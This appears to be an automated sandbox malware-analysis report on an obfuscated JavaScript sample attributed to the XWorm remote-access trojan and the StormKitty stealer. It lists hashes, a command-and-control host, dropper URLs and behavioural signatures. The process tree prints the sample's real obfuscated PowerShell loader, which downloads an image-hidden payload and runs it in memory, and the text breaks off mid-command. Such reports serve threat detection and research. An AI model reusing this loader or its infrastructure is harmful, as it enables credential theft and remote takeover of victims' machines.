Overview

overview

10

Static

static

1

f7012ceb3f...afd.js

windows7-x64

10

f7012ceb3f...afd.js

windows10-2004-x64

10

Analysis

  • max time kernel
    96s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-08-2024 01:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd.js

  • Size

    329KB

  • MD5

    b4105714b83cef4f0d8d859364cd6322

  • SHA1

    448f53b0c979beb7305db50a282bef00043e6840

  • SHA256

    f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd

  • SHA512

    91a19c5e098351e053de13d4c8ebe3677f2fec4aac7a63169a30ea147c75b0ce734e11011724ff6d7be7e7b2311ce9663ef9b6c52f2172febaca2c2f7cb03f0a

  • SSDEEP

    768:P7rCumqiWTinPK6eOK6mW3XKqe+KqmG9NqaeOqamWX3qKuH+qKmGxBK6eOK6mW3G:rdvJ5strohpUtg1vx

Score
10/10
stormkittyxwormcredential_accessdiscoveryexecutionpersistenceratstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

xworm

Version

5.0

C2

christyrusike21.duckdns.org:7000

Mutex

znkTtudE0WUuGVBW

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´VQBy䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´JwBo䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´Og䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQBh䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´dQBz䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´HY䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cgBn䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBz䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bo䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Xw䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´agBw䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´dwBl䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´QwBs䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´LQBP䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBX䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´YgBD䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´ZQBi䷡ ㌝ ₋ ⊩ ´EM䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgB0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´bgBs䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´EQ䷡ ㌝ ₋ ⊩ ´YQB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBV䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EU䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBV䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Rg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´UwB0䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBu䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBC䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBT䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´QQBS䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Pg䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBF䷡ ㌝ ₋ ⊩ ´E4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´D4䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBU䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´E8䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´TwBm䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BG䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cs䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´LgBM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´YgBh䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´T䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBT䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´YgBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´QwBv䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBG䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBt䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´YQBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Ng䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´bwBh䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBk䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´UgBl䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ 